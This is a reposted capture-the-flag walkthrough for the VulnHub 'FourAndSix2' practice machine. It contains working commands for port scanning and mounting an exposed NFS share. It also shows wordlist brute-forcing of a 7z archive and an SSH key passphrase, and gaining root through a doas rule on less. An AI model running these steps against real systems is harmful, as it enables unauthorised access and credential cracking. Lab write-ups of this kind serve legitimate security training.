作者:mobiledu2502921883 | 来源:互联网 | 2023-07-24 16:48
本文由编程笔记#小编为大家整理,主要介绍了markdown FourAndSix2相关的知识,希望对你有一定的参考价值。
Today I will exploit the vulnerable image which called "FourAndSix2". Here is the url to download this image: https://www.vulnhub.com/entry/fourandsix-201,266/. we need to import the image to vmware once we downloaded it.
now here we go.
# step1 start the Metasploit
```
>> msfconsole
```
# step2 scan ports
```
msf>> db_nmap 192.168.30.1/24
msf>> db_nmap 192.168.30.93
```
# step3 exploit
We can review the result of scanning and we found that it exists nfs vulnerability
```
msf>> search nfs
msf>> use ....
msf>> apt install nfs-common
msf>> mkdir /nfstest
msf>> mount -t nfs 192.168.30.93:/home/user/storage /nfstest -o nolock
msf>>cp /nfstest/backup.7z ~/vulnhub/fourandsix2
```
and then we found backup.7z has password protection. so we upload it to https://www.lostmypass.com/
to get the password
# step4 crack id_rsa
we found id_rsa and id_rsa.pub. but we can't use the id_rsa to login directly. we need to crack id_rsa
```
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
```
now we got the password: 12345678
# step5 login with id_rsa
```
ssh -i id_rsa user@192.168.30.93
```
# step6 find vulnerability for Privilge Escalation
```
>> find / -perm -u=s -type f 2>/dev/null
fourandsix2# cat /etc/doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root
>> doas /usr/bin/less /var/log/authlog
and enter v key translate to vi model and enter !sh
```
finally, we got the flag: acd043bc3103ed3dd02eee99d5b0ff42
and we got two shell to crack id_rsa and 7z password
```
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
```
magic command...